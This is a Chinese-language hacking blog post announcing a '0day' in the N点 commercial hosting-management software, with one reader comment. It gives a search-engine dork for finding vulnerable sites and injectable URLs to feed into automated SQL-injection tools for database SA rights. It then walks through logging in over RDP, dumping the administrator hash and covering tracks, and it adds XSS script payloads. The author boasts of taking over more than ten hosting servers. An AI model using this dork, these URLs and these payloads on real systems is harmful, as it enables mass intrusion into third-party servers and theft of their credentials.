关注我们
QRcode 邮件联系 QRcode
主页 » 信息安全 » 正文

N点商业版漏洞通杀0day以及利用方法

 feng  1,933 ℃  1条点评

作者:qingran
作者网站:www.qingran.me

不得不说N点实在是一个破东西
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂

好吧 抱怨一下就行了  接下来关键的时候到了

首先百度搜索关键字:inurl: (mmdatabase.asp)

我随便列举一个:   www.xxxx.com

修改链接:http://www.xxxx.com:80/Style/news.asp?action=true&RID=1&ID=1

扔入NBSI 或者啊D等各种傻逼工具后

你们会看到是SA权限

果断3389 上去  hash得到administrator密码

擦屁股走人~

经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的

基友我已经狂拿10多个IDC服务器了  嗯哼   你们懂的  玩玩就好 切勿破坏

本次使用的各种工具均在基友我网站上可以下载的到
http://www.qingran.me  帐号密码F4ck  你们懂的

再附上其他几个漏洞页面

SQL:

http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
http://www.xxxxxx.com:80/Manage/CreateHost.asp?Url=/Style/memberlogin.asp&PID=11
http://www.xxxxxx.com:80/Manage/CreateMySQL.asp?Url=/Style/memberlogin.asp&PID=9
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2

XSS证明:

http://www.xxxxxx.com:80/Manage/CreateHost.asp?PID=11&Url=/Style/memberlogin.asp";alert(42873);"

http://www.xxxxxx.com:80/Manage/CreateMySQL.asp?PID=9&Url=/Style/memberlogin.asp";alert(42873);"

http://www.xxxxxx.com:80/Style/domainInquiry.asp?dfcn=true?cndns=88888&button4=88888&checkbox2=.bj.cn<script>alert(42873)</script>

由此可见点就是坑逼中的战斗机   自从用了他我的眼泪都流干了  有做IDC的朋友千万别步我后尘啊   便宜没好货好货不便宜
还是星外吧  你们懂的

作为一个商用程序   安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?

PS:其实我真的很想知道你说N点这SB asp就asp吧  为什么asp还非要MSSQL  这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。   o(︶︿︶)o 唉

-------END

本文标签:
ecshop最新注入0day漏洞详细分析报告-
HTML5最新漏洞:用户硬盘或被垃圾数据塞满
我是如何打造一款自动化SQL注入工具的我是如何打造一款自动化SQL注入工具的分析勒索软件Cerber的攻击方法分析勒索软件Cerber的攻击方法​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)某个商业定向攻击活动分析某个商业定向攻击活动分析

已有1条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

  1. avatar
    #1 冰锋刺客

    好吧,非常多网站中招,一大批。
    不过我测试了十几个,都是DB_owner权限也

    2013-03-02 上午 7:13回复


注册帐号  |  忘记密码